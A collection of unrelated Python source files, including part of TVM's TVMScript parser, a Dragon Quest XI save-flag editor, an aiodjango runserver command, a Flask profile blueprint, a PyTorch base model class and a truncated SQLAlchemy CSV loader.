self.current_col_offset = node.span.start_column
self.context.enter_scope(nodes=node.body.stmts)
# for scope handler process the scope
arg_list = [
tvm.runtime.convert(arg, span=node.rhs.span)
for arg in self.parse_arg_list(func, node.rhs)
]
func.enter_scope(node, self.context, arg_list, node.rhs.func_name.span)
func.body = self.parse_body(node)
res = func.exit_scope(node, self.context, arg_list, node.rhs.func_name.span)
# exit the scope
self.context.exit_scope()
self.current_lineno, self.current_col_offset = old_lineno, old_col_offset
return res
def transform_While(self, node):
"""While visitor
AST abstract grammar:
While(expr condition, stmt* body)
"""
condition = self.transform(node.condition)
# body
self.context.enter_scope(nodes=node.body.stmts)
body = self.parse_body(node)
self.context.exit_scope()
return tvm.tir.While(condition, body, span=tvm_span_from_synr(node.span))
def transform_With(self, node):
"""With visitor
AST abstract grammar:
With(withitem* items, stmt* body, string? type_comment)
withitem = (expr context_expr, expr? optional_vars)
By now 2 patterns of With is supported:
1. with scope handler with symbol def
with T.block(*axes)/T.allocate() as targets:
2. with scope handler without symbol def
with T.let()/T.Assert()/T.attr()/T.realize()
"""
if not isinstance(node.rhs, ast.Call):
self.report_error(
"The context expression of a `with` statement should be a function call.",
node.rhs.span,
)
func = self.transform(node.rhs.func_name)
if not isinstance(func, WithScopeHandler):
self.report_error(
f"Function {func} cannot be used in a `with` statement.", node.rhs.func_name.span
)
# prepare for new block scope
old_lineno, old_col_offset = self.current_lineno, self.current_col_offset
self.current_lineno = node.body.span.start_line
self.current_col_offset = node.body.span.start_column
self.context.enter_block_scope(nodes=node.body.stmts)
# with scope handler process the scope
arg_list = self.parse_arg_list(func, node.rhs)
func.enter_scope(node, self.context, arg_list, node.rhs.func_name.span)
func.body = self.parse_body(node)
res = func.exit_scope(node, self.context, arg_list, node.rhs.func_name.span)
# exit the scope
self.context.exit_block_scope()
self.current_lineno, self.current_col_offset = old_lineno, old_col_offset
return res
def transform_If(self, node):
"""If visitor
AST abstract grammar:
If(expr test, stmt* body, stmt* orelse)
"""
condition = self.transform(node.condition)
# then body
self.context.enter_scope(nodes=node.true.stmts)
then_body = self.parse_body(node)
self.context.exit_scope()
# else body
if len(node.false.stmts) > 0:
self.context.enter_scope(nodes=node.false.stmts)
else_body = self.parse_body(node)
self.context.exit_scope()
else:
else_body = None
return tvm.tir.IfThenElse(
condition, then_body, else_body, span=tvm_span_from_synr(node.span)
)
def transform_Call(self, node):
"""Call visitor
3 different Call patterns are allowed:
1. Intrin representing a PrimExpr/IterVar
1.1 tir.int/uint/float8/16/32/64/floormod/floordiv/load/cast/ramp/broadcast/max
1.2 tir.range/reduce_axis/scan_axis/opaque_axis
2. tir.Op(dtype, ...)
3. other callable functions
"""
if isinstance(node.func_name, ast.Op):
if node.func_name.name == ast.BuiltinOp.Subscript:
return self.transform_Subscript(node)
if node.func_name.name in self._binop_maker:
lhs = self.transform(node.params[0])
# There is no supertype for everything that can appear in
# an expression, so we manually add what we might get here.
if not isinstance(lhs, (tvm.tir.PrimExpr, BufferSlice)):
# We would really like to report a more specific
# error here, but this parser contains no distinction
# between parsing statements and parsing expressions. All
# rules just call `transform`.
self.report_error(
f"Left hand side of binary op must be a PrimExpr, "
"but it is a {type(lhs).__name__}",
node.params[0].span,
)
rhs = self.transform(node.params[1])
if not isinstance(rhs, (tvm.tir.PrimExpr, BufferSlice)):
self.report_error(
f"Right hand side of binary op must be a PrimExpr, "
"but it is a {type(rhs).__name__}",
node.params[1].span,
)
return call_with_error_reporting(
self.report_error,
node.span,
lambda node, lhs, rhs, span: self._binop_maker[node.func_name.name](
lhs, rhs, span=span
),
node,
lhs,
rhs,
tvm_span_from_synr(node.span),
)
if node.func_name.name in self._unaryop_maker:
rhs = self.transform(node.params[0])
return self._unaryop_maker[node.func_name.name](
rhs, span=tvm_span_from_synr(node.span)
)
self.report_error(f"Unsupported operator {node.func_name.name}.", node.func_name.span)
else:
func = self.transform(node.func_name)
if isinstance(func, Intrin) and not func.stmt:
# pattern 1
arg_list = self.parse_arg_list(func, node)
return call_with_error_reporting(
self.report_error,
node.func_name.span,
func.handle,
arg_list,
node.func_name.span,
)
else:
args = [self.transform(arg) for arg in node.params]
kw_args = {
self.transform(k): self.transform(v) for k, v in node.keyword_params.items()
}
if isinstance(func, tvm.tir.op.Op):
if not "dtype" in kw_args.keys():
self.report_error(f"{func} requires a dtype keyword argument.", node.span)
# pattern 2
return tvm.tir.Call(
kw_args["dtype"], func, args, span=tvm_span_from_synr(node.span)
)
elif callable(func):
# pattern 3
return func(*args, **kw_args)
else:
self.report_error(
f"Function is neither callable nor a tvm.tir.op.Op (it is a {type(func)}).",
node.func_name.span,
)
def transform_UnassignedCall(self, node):
"""Visitor for statements that are function calls.
This handles function calls that appear on thier own line like `tir.realize`.
Examples
--------
.. code-block:: python
@T.prim_func
def f():
A = T.buffer_decl([10, 10])
T.realize(A[1:2, 1:2], "") # This is an UnassignedCall
A[1, 1] = 2 # This is also an UnassignedCall
"""
# Only allowed builtin operator that can be a statement is x[1] = 3 i.e. subscript assign.
if isinstance(node.call.func_name, ast.Op):
if node.call.func_name.name != ast.BuiltinOp.SubscriptAssign:
self.report_error(
"Binary and unary operators are not allowed as a statement", node.span
)
else:
return self.transform_SubscriptAssign(node.call)
# handle a regular function call
func = self.transform(node.call.func_name)
arg_list = self.parse_arg_list(func, node.call)
if isinstance(func, tir.scope_handler.AssertHandler):
self.report_error(
"A standalone `T.Assert` is not allowed. Use `assert condition, message` "
"instead.",
node.call.func_name.span,
)
if isinstance(func, Intrin):
if func.stmt:
return call_with_error_reporting(
self.report_error,
node.call.func_name.span,
func.handle,
arg_list,
node.call.func_name.span,
)
else:
self.report_error(f"This intrinsic cannot be used as a statement.", node.call.span)
elif isinstance(func, WithScopeHandler) and func.concise_scope and not func.def_symbol:
func.enter_scope(node, self.context, arg_list, node.call.func_name.span)
func.body = self.parse_body(node)
return func.exit_scope(node, self.context, arg_list, node.call.func_name.span)
elif isinstance(func, SpecialStmt) and not func.def_symbol:
func.handle(node, self.context, arg_list, node.call.func_name.span)
return
self.report_error(
"Unexpected statement. Expected an assert, an intrinsic, a with statement, or a "
f"special statement, but got {type(func).__name__}.",
node.call.func_name.span,
)
def transform_Slice(self, node):
start = self.transform(node.start)
end = self.transform(node.end)
if not (isinstance(node.step, ast.Constant) and node.step.value == 1):
self.report_error("Only step size 1 is supported for slices.", node.step.span)
return Slice(start, end)
def transform_Subscript(self, node):
"""Array access visitor.
By now only 3 types of Subscript are supported:
1. Buffer[index, index, ...], Buffer element access(BufferLoad & BufferStore)
Var[index] Buffer element access()
2. Buffer[start: stop, start: stop, ...], BufferRealize(realize(buffer[...]))
3. Array[index], Buffer element access
"""
symbol = self.transform(node.params[0])
if symbol is None:
self.report_error(
f"Variable {node.params[0].id.name} is not defined.", node.params[0].span
)
indexes = [self.transform(x) for x in node.params[1].values]
if isinstance(symbol, tvm.tir.expr.Var):
if symbol.dtype == "handle":
self.report_error(
"Cannot read directly from a handle, use `T.match_buffer` "
"to create a buffer to read from.",
node.params[0].span,
)
if len(indexes) > 1:
self.report_error(
"Only a single index can be provided when indexing into a `var`.",
node.params[1].span,
)
index = indexes[0]
if not isinstance(index, (tvm.tir.PrimExpr, int)):
self.report_error(
"Var load index should be an int or PrimExpr, but it is a" + type(index),
node.span,
)
return call_with_error_reporting(
self.report_error,
node.span,
tvm.tir.Load,
"float32",
symbol,
index,
True,
span=tvm_span_from_synr(node.span),
)
elif isinstance(symbol, tvm.tir.Buffer):
return BufferSlice(
symbol, indexes, self.report_error, span=tvm_span_from_synr(node.span)
)
elif isinstance(symbol, tvm.container.Array):
if len(indexes) > 1:
self.report_error(
"Array access should be one-dimension access, but the indices are "
+ str(indexes),
node.span,
)
index = indexes[0]
if not isinstance(index, (int, tvm.tir.expr.IntImm)):
self.report_error(
"Array access index expected int or IntImm, but got " + type(index),
node.span,
)
if int(index) >= len(symbol):
self.report_error(
f"Array access out of bound, size: {len(symbol)}, got index {index}.",
node.span,
)
return symbol[int(index)]
else:
self.report_error(
f"Cannot subscript from a {type(symbol).__name__}. Only variables and "
"buffers are supported.",
node.params[0].span,
)
def transform_Attr(self, node):
"""Visitor for field access of the form `x.y`.
This visitor is used to lookup function and symbol names. We have two
cases to handle here:
1. If we have a statement of the form `tir.something`, then we lookup
`tir.something` in the `Registry`. If the function is not in the
registry, then we try to find a `tvm.ir.op.Op` with the same name.
2. All other names `tvm.something` are lookup up in this current python
namespace.
"""
def get_full_attr_name(node: ast.Attr) -> str:
reverse_field_names = [node.field.name]
while isinstance(node.object, ast.Attr):
node = node.object
reverse_field_names.append(node.field.name)
if isinstance(node.object, ast.Var):
reverse_field_names.append(node.object.id.name)
return ".".join(reversed(reverse_field_names))
if isinstance(node.object, (ast.Var, ast.Attr)):
full_attr_name = get_full_attr_name(node)
attr_object, fields = full_attr_name.split(".", maxsplit=1)
if self.match_tir_namespace(attr_object):
func_name = "tir." + fields
res = Registry.lookup(func_name)
if res is not None:
return res
try:
return tvm.ir.op.Op.get(func_name)
except TVMError as e:
# Check if we got an attribute error
if e.args[0].find("AttributeError"):
self.report_error(f"Unregistered function `tir.{fields}`.", node.span)
else:
raise e
symbol = self.transform(node.object)
if symbol is None:
self.report_error("Unsupported Attribute expression.", node.object.span)
if not hasattr(symbol, node.field.name):
self.report_error(
f"Type {type(symbol)} does not have a field called `{node.field.name}`.", node.span
)
res = getattr(symbol, node.field.name)
return res
def transform_TypeAttr(self, node):
"""Visitor for field access of the form `x.y` for types.
We have two cases here:
1. If the type is of the form `T.something`, we look up the type in
the `tir` namespace in this module.
2. If the type is of the form `tvm.x.something` then we look up
`tvm.x.something` in this modules namespace.
"""
if isinstance(node.object, ast.TypeVar):
if self.match_tir_namespace(node.object.id.name):
if not hasattr(tir, node.field.name):
self.report_error(
f"Invalid type annotation `tir.{node.field.name}`.", node.span
)
return getattr(tir, node.field.name)
symbol = self.transform(node.object)
if symbol is None:
self.report_error("Unsupported Attribute expression", node.object.span)
if not hasattr(symbol, node.field):
self.report_error(
f"Type {type(symbol)} does not have a field called `{node.field}`.", node.span
)
res = getattr(symbol, node.field)
return res
def transform_DictLiteral(self, node):
"""Dictionary literal visitor.
Handles dictionary literals of the form `{x:y, z:2}`.
"""
keys = [self.transform(key) for key in node.keys]
values = [self.transform(value) for value in node.values]
return dict(zip(keys, values))
def transform_Tuple(self, node):
"""Tuple visitor.
Handles tuples of the form `(x, y, 2)`.
"""
return tuple(self.transform(element) for element in node.values)
def transform_ArrayLiteral(self, node):
"""List literal visitor.
Handles lists of the form `[x, 2, 3]`.
"""
return [self.transform(element) for element in node.values]
def transform_Var(self, node):
"""Variable visitor
Handles variables like `x` in `x = 2`.
"""
name = node.id.name
if name == "meta":
return self.meta
symbol = Registry.lookup(name)
if symbol is not None:
return symbol
symbol = self.context.lookup_symbol(name)
if symbol is not None:
return symbol
self.report_error(f"Unknown identifier {name}.", node.span)
def transform_TypeVar(self, node):
"""Type variable visitor.
Equivalent to `transform_Var` but for types.
"""
name = node.id.name
symbol = Registry.lookup(name) or self.context.lookup_symbol(name)
if symbol is not None:
return symbol
self.report_error(f"Unknown identifier {name}.", node.span)
def transform_Constant(self, node):
"""Constant value visitor.
Constant values include `None`, `"strings"`, `2` (integers), `4.2`
(floats), and `true` (booleans).
"""
return tvm.runtime.convert(node.value, span=tvm_span_from_synr(node.span))
def transform_TypeConstant(self, node):
"""Constant value visitor for types.
See `transform_Constant`.
"""
return node.value
def transform_TypeTuple(self, node):
"""Tuple value visitor for types.
Mostly used in `transform_TypeCall` and `transform_TypeApply`.
"""
return [self.transform(value) for value in node.values]
def transform_TypeApply(self, node):
"""Visitor for Type[Type] expressions.
Mostly used for ``T.Ptr`` expressions.
"""
func = self.transform(node.func_name)
if not isinstance(func, ty.TypeGeneric) or not hasattr(func, "__getitem__"):
self.report_error(
f"Use of type arguments requires a type that accepts type arguments (e.g. T.Ptr), "
f"but found {type(func).__name__} instead.",
node.span,
)
param_types = []
for param in node.params:
param_type = self.transform(param)
if not isinstance(param_type, ty.TypeGeneric):
self.report_error(f"Expected a type but found {type(param).__name__}", param.span)
param_types.append(param_type)
if len(param_types) == 1:
return func[param_types[0]]
else:
return func[param_types]
def handle_match_buffer_type(self, node, buffer_name):
"""special function to handle syntax sugar for match buffer.
This method is for buffer declarations in the function parameters.
"""
func = self.transform(node.func_name)
assert isinstance(func, SpecialStmt)
# parse args and kwargs for TypeCall and TypeApply
arg_list = self.parse_arg_list(func, node)
# Note that the third element in arg_list would always be the 'name'
# TODO: This index is hardcoded as a workaround. Better to make it programmatic
if arg_list[2] is None:
arg_list[2] = buffer_name
buf = func.handle(node, self.context, arg_list, node.func_name.span)
return buf
def transform_Return(self, node):
self.report_error(
"TVM script does not support return statements. Instead the last statement in any "
"block is implicitly returned.",
node.span,
)
def get_tir_namespace(script: Union[Callable, type]) -> List[str]:
assert inspect.isfunction(script) or inspect.isclass(script)
env: Dict[str, Any] = script.__globals__
return [key for key in env.keys() if env[key] == tir]
def from_source(
input_func: Union[str, Callable], tir_prefix: Optional[List[str]] = None
) -> Union[PrimFunc, IRModule]:
"""Parse function or string into PrimFunc or IRModule.
If possible, pass the TVM script in as a function so that line numbers and
filename will be accurate.
Parameters
----------
input_module : Union[str, Callable]
The python function to be parsed.
tir_prefix : Optional[List[str]]
The tir prefix list. Only works for str input, default by "tir" and "T".
Returns
-------
output : Union[Function, Module]
The Function or Module in IR.
"""
if isinstance(input_func, str):
tir_prefix = ["T", "tir"] if tir_prefix is None else tir_prefix
return to_ast(input_func, TVMDiagnosticCtx(), TVMScriptParser(0, tir_prefix))
elif inspect.isfunction(input_func):
_, start_line = inspect.getsourcelines(input_func)
env: Dict[str, Any] = input_func.__globals__
namespace = [key for key in env.keys() if env[key] is tir]
parser = TVMScriptParser(start_line, namespace)
result = to_ast(input_func, TVMDiagnosticCtx(), parser)
return result
else:
raise TypeError("Only function definitions are supported.")
def ir_module(input_module: type) -> IRModule:
"""Decorate a python class as tvm IRModule.
Parameters
----------
input_module : type
The python class to be parsed.
Returns
-------
output : IRModule
The result IRModule.
"""
if inspect.isclass(input_module):
func_dict = {
name: f for name, f in input_module.__dict__.items() if isinstance(f, BaseFunc)
}
mod = IRModule(func_dict)
mod = relax.transform.ResolveGlobals()(mod)
# FIXME(@altanh): where is the source map?
return mod
raise TypeError("Only class definitions are supported.")
|
the-stack_106_16958
|
import dq11s.save
import sys
import struct
DRACONIAN_FLAG_IDENTIFIER = "DLC_00".encode()
DRACONIAN_FLAG_OFFSET_FROM_IDENTIFIER = -0x30
DRACONIAN_FLAG_STRUCT = struct.Struct('<IIIIIIII')
DRACONIAN_FLAGS_TO_ADD = [
1, # flag 0
1, # flag 1
1, # flag 2
1, # flag 3
1, # flag 4
1, # flag 5
1, # flag 6
1, # flag 7
]
if __name__ == "__main__":
save_path = sys.argv[1]
with open(save_path, 'rb') as save_file:
save_buffer = save_file.read()
save_is_encrypted, save_version = dq11s.save.get_save_is_encrypted_and_version(save_buffer)
if save_is_encrypted is None:
print("file not recognized")
exit(-1)
if save_is_encrypted:
save_buffer, is_verified = dq11s.save.get_save_decrypt(save_buffer, save_version)
if not is_verified:
print("failed to verify save decryption")
exit(-2)
draconian_identifier_offset = save_buffer.find(DRACONIAN_FLAG_IDENTIFIER)
if draconian_identifier_offset == -1:
print("failed to find flag location")
exit(-3)
draconian_offset = draconian_identifier_offset + DRACONIAN_FLAG_OFFSET_FROM_IDENTIFIER
save_buffer = save_buffer[:draconian_offset] + DRACONIAN_FLAG_STRUCT.pack(*DRACONIAN_FLAGS_TO_ADD) \
+ save_buffer[draconian_offset + DRACONIAN_FLAG_STRUCT.size:]
with open(save_path, 'wb') as out_file:
out_file.write(dq11s.save.get_save_encrypt(save_buffer, save_version))
print("pray to sothis that this has worked wait wrong franchise")
|
the-stack_106_16960
|
from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.TablaSimbolos.Simbolo import Simbolo
class Declare(Instruccion):
def __init__(self, id, operacion, id2, linea, columna):
Instruccion.__init__(self,None,linea,columna)
self.identificador = id
self.valor = id2
self.operacion = operacion
def ejecutar(self, ts, arbol):
super().ejecutar(ts,arbol)
#el id es para guardarlo en la tabla
exp = Simbolo(self.identificador,self.operacion,self.valor,self.linea,self.columna)
ts.setVariable(exp)
print("imprimir_declaracion")
'''
instruccion = Declare("hola mundo",None, 1,2)
instruccion.ejecutar(None,None)
'''
|
the-stack_106_16961
|
import asyncio
import errno
import datetime
import logging
import os
import socket
import sys
from django.conf import settings
from django.contrib.staticfiles.management.commands.runserver import Command as BaseCommand
from django.utils import autoreload
from django.utils.encoding import force_text
from aiodjango import get_aio_application
class Command(BaseCommand):
def get_handler(self, *args, **options):
wsgi = super().get_handler(*args, **options)
return get_aio_application(wsgi=wsgi)
def inner_run(self, *args, **options):
# If an exception was silenced in ManagementUtility.execute in order
# to be raised in the child process, raise it now.
autoreload.raise_last_exception()
shutdown_message = options.get('shutdown_message', '')
quit_command = 'CTRL-BREAK' if sys.platform == 'win32' else 'CONTROL-C'
self.stdout.write("Performing system checks...\n\n")
self.check(display_num_errors=True)
self.check_migrations()
now = datetime.datetime.now().strftime('%B %d, %Y - %X')
self.stdout.write(now)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Starting aidjango server at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": '[%s]' % self.addr if self._raw_ipv6 else self.addr,
"port": self.port,
"quit_command": quit_command,
})
if options.get('use_reloader'):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
else:
loop = asyncio.get_event_loop()
app = self.get_handler(*args, **options)
log = logging.getLogger('aiodjango.runserver')
log.propagate = False
log.setLevel(logging.INFO)
stdout = logging.StreamHandler(stream=self.stdout)
log.addHandler(stdout)
handler = app.make_handler(access_log=log, access_log_format='%t "%r" %s %b %D')
server = None
try:
server = loop.run_until_complete(
loop.create_server(handler, self.addr, int(self.port)))
loop.run_forever()
except socket.error as e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
errno.EACCES: "You don't have permission to access that port.",
errno.EADDRINUSE: "That port is already in use.",
errno.EADDRNOTAVAIL: "That IP address can't be assigned to.",
}
try:
error_text = ERRORS[e.errno]
except KeyError:
error_text = force_text(e)
self.stderr.write("Error: %s" % error_text)
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write(shutdown_message)
sys.exit(0)
finally:
loop.run_until_complete(handler.finish_connections(1.0))
if server is not None:
server.close()
loop.run_until_complete(server.wait_closed())
loop.run_until_complete(app.finish())
loop.close()
|
the-stack_106_16964
|
from app import db
from app.models.user import User
from app.forms.auth import EditProfileForm
from flask import current_app, Blueprint, render_template, request, redirect, url_for, flash
from flask_login import current_user, login_required
user = Blueprint('user', __name__, url_prefix='/user')
@user.route('/<username>')
@login_required
def view(username):
the_user = User.query.filter_by(username=username).first_or_404()
return render_template('user.html', user=the_user)
@user.route('/edit', methods=['GET', 'POST'])
@login_required
def edit():
form = EditProfileForm(current_user.username)
if form.validate_on_submit():
current_user.username = form.username.data
current_user.about_me = form.about_me.data
db.session.commit()
flash('Your changes have been saved.')
return redirect(url_for('user.edit'))
elif request.method == 'GET':
form.username.data = current_user.username
form.about_me.data = current_user.about_me
return render_template('edit_profile.html', title='Edit Profile',
form=form)
#@user.before_request
#def before_request():
# if current_user.is_authenticated:
# current_user.last_seen = datetime.utcnow()
# db.session.commit()
|
the-stack_106_16965
|
__author__ = 'patras'
from domain_springDoor import *
from timer import DURATION
from state import state, rv
DURATION.TIME = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 7,
'take': 2,
'put': 2,
}
DURATION.COUNTER = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 7,
'take': 2,
'put': 2,
}
rv.LOCATIONS = [1, 2, 3, 4]
rv.EDGES = {1: [2], 2: [1, 3], 3: [2, 4], 4: [3]}
rv.DOORS = ['d1', 'd2']
rv.DOORLOCATIONS = {(3, 4): 'd1', (1, 2): 'd2'}
rv.DOORTYPES = {'d1': 'ordinary', 'd2': 'spring'}
rv.ROBOTS = ['r1', 'r2', 'r3']
def ResetState():
state.load = {'r1': NIL, 'r2': NIL, 'r3': NIL}
state.status = {'r1': 'free', 'r2': 'free', 'r3': 'free'}
state.loc = {'r1': 4, 'r2': 4, 'r3': 4}
state.pos = {'o1': 1}
state.doorStatus = {'d1': 'closed', 'd2': 'closed', }
state.doorType = {'d1': UNK, 'd2': UNK, }
tasks = {
8: [['fetch', 'r1', 'o1', 1]],
}
eventsEnv = {
}
|
the-stack_106_16968
|
import os
import torch
from collections import OrderedDict
from abc import ABC, abstractmethod
from . import networks
from tqdm import tqdm
class BaseModel(ABC):
"""This class is an abstract base class (ABC) for models.
To create a subclass, you need to implement the following five functions:
-- <__init__>: initialize the class; first call BaseModel.__init__(self, opt).
-- <set_input>: unpack data from dataset and apply preprocessing.
-- <forward>: produce intermediate results.
-- <optimize_parameters>: calculate losses, gradients, and update network weights.
-- <modify_commandline_options>: (optionally) add model-specific options and set default options.
"""
def __init__(self, opt):
"""Initialize the BaseModel class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
When creating your custom class, you need to implement your own initialization.
In this fucntion, you should first call <BaseModel.__init__(self, opt)>
Then, you need to define four lists:
-- self.loss_names (str list): specify the training losses that you want to plot and save.
-- self.model_names (str list): specify the images that you want to display and save.
-- self.visual_names (str list): define networks used in our training.
-- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example.
"""
self.opt = opt
self.gpu_ids = opt.gpu_ids
self.isTrain = opt.isTrain
self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu') # get device name: CPU or GPU
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name) # save all the checkpoints to save_dir
if opt.preprocess != 'scale_width': # with [scale_width], input images might have different sizes, which hurts the performance of cudnn.benchmark.
torch.backends.cudnn.benchmark = True
self.loss_names = []
self.model_names = []
self.visual_names = []
self.optimizers = []
self.image_paths = []
self.metric = 0 # used for learning rate policy 'plateau'
@staticmethod
def dict_grad_hook_factory(add_func=lambda x: x):
saved_dict = dict()
def hook_gen(name):
def grad_hook(grad):
saved_vals = add_func(grad)
saved_dict[name] = saved_vals
return grad_hook
return hook_gen, saved_dict
@staticmethod
def modify_commandline_options(parser, is_train):
"""Add new model-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
return parser
@abstractmethod
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): includes the data itself and its metadata information.
"""
pass
@abstractmethod
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
pass
@abstractmethod
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
pass
def setup(self, opt):
"""Load and print networks; create schedulers
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
if self.isTrain:
self.schedulers = [networks.get_scheduler(optimizer, opt) for optimizer in self.optimizers]
if not self.isTrain or opt.continue_train:
load_suffix = opt.epoch
self.load_networks(load_suffix)
self.print_networks(opt.verbose)
def parallelize(self):
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
setattr(self, 'net' + name, torch.nn.DataParallel(net, self.opt.gpu_ids))
def data_dependent_initialize(self, data):
pass
def eval(self):
"""Make models eval mode during test time"""
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
net.eval()
def test(self):
"""Forward function used in test time.
This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop
It also calls <compute_visuals> to produce additional visualization results
"""
with torch.no_grad():
self.forward()
self.compute_visuals()
def compute_visuals(self):
"""Calculate additional output images for visdom and HTML visualization"""
pass
def get_image_paths(self):
""" Return image paths that are used to load current data"""
return self.image_paths
def update_learning_rate(self):
"""Update learning rates for all the networks; called at the end of every epoch"""
for scheduler in self.schedulers:
if self.opt.lr_policy == 'plateau':
scheduler.step(self.metric)
else:
scheduler.step()
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate = %.7f' % lr)
def get_current_visuals(self):
"""Return visualization images. train.py will display these images with visdom, and save the images to a HTML"""
visual_ret = OrderedDict()
for name in self.visual_names:
if isinstance(name, str):
visual_ret[name] = getattr(self, name)
return visual_ret
def get_current_losses(self):
"""Return traning losses / errors. train.py will print out these errors on console, and save them to a file"""
errors_ret = OrderedDict()
for name in self.loss_names:
if isinstance(name, str):
errors_ret[name] = float(getattr(self, 'loss_' + name)) # float(...) works for both scalar tensor and float number
return errors_ret
def save_networks(self, epoch):
"""Save all the networks to the disk.
Parameters:
epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)
"""
for name in self.model_names:
if isinstance(name, str):
save_filename = '%s_net_%s.pth' % (epoch, name)
save_path = os.path.join(self.save_dir, save_filename)
net = getattr(self, 'net' + name)
if len(self.gpu_ids) > 0 and torch.cuda.is_available():
torch.save(net.module.cpu().state_dict(), save_path)
net.cuda(self.gpu_ids[0])
else:
torch.save(net.cpu().state_dict(), save_path)
def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):
"""Fix InstanceNorm checkpoints incompatibility (prior to 0.4)"""
key = keys[i]
if i + 1 == len(keys): # at the end, pointing to a parameter/buffer
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'running_mean' or key == 'running_var'):
if getattr(module, key) is None:
state_dict.pop('.'.join(keys))
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'num_batches_tracked'):
state_dict.pop('.'.join(keys))
else:
self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)
def load_networks(self, epoch):
"""Load all the networks from the disk.
Parameters:
epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)
"""
for name in self.model_names:
if isinstance(name, str):
load_filename = '%s_net_%s.pth' % (epoch, name)
if self.opt.isTrain and self.opt.pretrained_name is not None:
load_dir = os.path.join(self.opt.checkpoints_dir, self.opt.pretrained_name)
else:
load_dir = self.save_dir
load_path = os.path.join(load_dir, load_filename)
net = getattr(self, 'net' + name)
if isinstance(net, torch.nn.DataParallel):
net = net.module
tqdm.write('loading the model from %s' % load_path)
# if you are using PyTorch newer than 0.4 (e.g., built from
# GitHub source), you can remove str() on self.device
state_dict = torch.load(load_path, map_location=str(self.device))
if hasattr(state_dict, '_metadata'):
del state_dict._metadata
# patch InstanceNorm checkpoints prior to 0.4
# for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop
# self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))
net.load_state_dict(state_dict)
def print_networks(self, verbose):
"""Print the total number of parameters in the network and (if verbose) network architecture
Parameters:
verbose (bool) -- if verbose: print the network architecture
"""
tqdm.write('---------- Networks initialized -------------')
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
num_params = 0
for param in net.parameters():
num_params += param.numel()
if verbose:
print(net)
tqdm.write('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))
tqdm.write('-----------------------------------------------')
def set_requires_grad(self, nets, requires_grad=False):
"""Set requies_grad=Fasle for all the networks to avoid unnecessary computations
Parameters:
nets (network list) -- a list of networks
requires_grad (bool) -- whether the networks require gradients or not
"""
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
def generate_visuals_for_evaluation(self, data, mode):
return {}
|
the-stack_106_16969
|
import csv
import datetime
import re
import os
import logging
import glob
#import app.models
import app.database
import sqlalchemy
DB_ENGINE = app.database.engine
DB_METADATA = sqlalchemy.MetaData()
#1998-02-09
DATEFORMAT = '%Y-%m-%d'
LOGGER = logging.getLogger()
class TypeMap:
"""used to map specific types defined by site data.
"""
def __init__(self):
self.defaultType = sqlalchemy.types.String
self.typeMap = {
"docid": sqlalchemy.types.Integer,
"site_id": sqlalchemy.types.Integer,
"siteid": sqlalchemy.types.Integer,
"catid": sqlalchemy.types.Integer,
"sequenceno": sqlalchemy.types.Integer,
"pin": sqlalchemy.types.Integer,
"pidno": sqlalchemy.types.Integer,
"eventid": sqlalchemy.types.Integer,
"associatedsiteid": sqlalchemy.types.Integer,
"participant_id": sqlalchemy.types.Integer,
"participantid": sqlalchemy.types.Integer,
"questionid": sqlalchemy.types.Integer,
"parentid": sqlalchemy.types.Integer,
"ownerid": sqlalchemy.types.Integer,
"contactid": sqlalchemy.types.Integer,
"completorid": sqlalchemy.types.Integer,
"aec_id": sqlalchemy.types.Integer,
"lat": sqlalchemy.types.Integer,
"latdeg": sqlalchemy.types.Integer,
"latmin": sqlalchemy.types.Integer,
"latsec": sqlalchemy.types.Integer,
"lon": sqlalchemy.types.Integer,
"londeg": sqlalchemy.types.Integer,
"lonmin": sqlalchemy.types.Integer,
"lonsec": sqlalchemy.types.Integer,
"regdate": sqlalchemy.types.Date,
"eventdate": sqlalchemy.types.Date,
"approval_date": sqlalchemy.types.Date,
"moddate": sqlalchemy.types.Date,
"tombdate": sqlalchemy.types.Date,
"effectivedate": sqlalchemy.types.Date,
"enddate": sqlalchemy.types.Date,
"datenoted": sqlalchemy.types.Date,
"date_completed": sqlalchemy.types.Date,
